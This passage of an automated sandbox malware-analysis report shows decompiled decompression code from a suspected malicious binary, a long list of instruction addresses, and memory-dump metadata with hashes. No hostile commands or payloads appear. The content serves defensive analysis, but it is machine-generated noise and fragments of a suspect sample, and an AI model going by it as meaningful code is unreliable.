                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__edx =  *(__ebp - 8);
                                                                                    												__cl =  *(__eax + __edx);
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												 *(__ebp - 0x5c) = __cl;
                                                                                    												 *(__eax + __edx) = __cl;
                                                                                    												__eax = __eax + 1;
                                                                                    												__edx = 0;
                                                                                    												_t275 = __eax %  *(__ebp - 0x74);
                                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                                    												__edx = _t275;
                                                                                    												__eax =  *(__ebp - 0x68);
                                                                                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    												_t284 = __ebp - 0x64;
                                                                                    												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                    												__eflags =  *_t284;
                                                                                    												 *( *(__ebp - 0x68)) = __cl;
                                                                                    												L80:
                                                                                    												 *(__ebp - 0x14) = __edx;
                                                                                    												goto L81;
                                                                                    											case 0x1c:
                                                                                    												while(1) {
                                                                                    													L123:
                                                                                    													__eflags =  *(__ebp - 0x64);
                                                                                    													if( *(__ebp - 0x64) == 0) {
                                                                                    														break;
                                                                                    													}
                                                                                    													__eax =  *(__ebp - 0x14);
                                                                                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    													__eflags = __eax -  *(__ebp - 0x74);
                                                                                    													if(__eax >=  *(__ebp - 0x74)) {
                                                                                    														__eax = __eax +  *(__ebp - 0x74);
                                                                                    														__eflags = __eax;
                                                                                    													}
                                                                                    													__edx =  *(__ebp - 8);
                                                                                    													__cl =  *(__eax + __edx);
                                                                                    													__eax =  *(__ebp - 0x14);
                                                                                    													 *(__ebp - 0x5c) = __cl;
                                                                                    													 *(__eax + __edx) = __cl;
                                                                                    													__eax = __eax + 1;
                                                                                    													__edx = 0;
                                                                                    													_t414 = __eax %  *(__ebp - 0x74);
                                                                                    													__eax = __eax /  *(__ebp - 0x74);
                                                                                    													__edx = _t414;
                                                                                    													__eax =  *(__ebp - 0x68);
                                                                                    													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                    													__eflags =  *(__ebp - 0x30);
                                                                                    													 *( *(__ebp - 0x68)) = __cl;
                                                                                    													 *(__ebp - 0x14) = _t414;
                                                                                    													if( *(__ebp - 0x30) > 0) {
                                                                                    														continue;
                                                                                    													} else {
                                                                                    														L81:
                                                                                    														 *(__ebp - 0x88) = 2;
                                                                                    														goto L1;
                                                                                    													}
                                                                                    												}
                                                                                    												 *(__ebp - 0x88) = 0x1c;
                                                                                    												goto L170;
                                                                                    										}
                                                                                    									}
                                                                                    									L171:
                                                                                    									_t535 = _t534 | 0xffffffff;
                                                                                    									goto L172;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					goto L1;
                                                                                    				}
                                                                                    			}













                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407122
                                                                                    0x00407122
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004073ce
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407120

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 98%
                                                                                    			E00407068() {
                                                                                    				unsigned short _t531;
                                                                                    				signed int _t532;
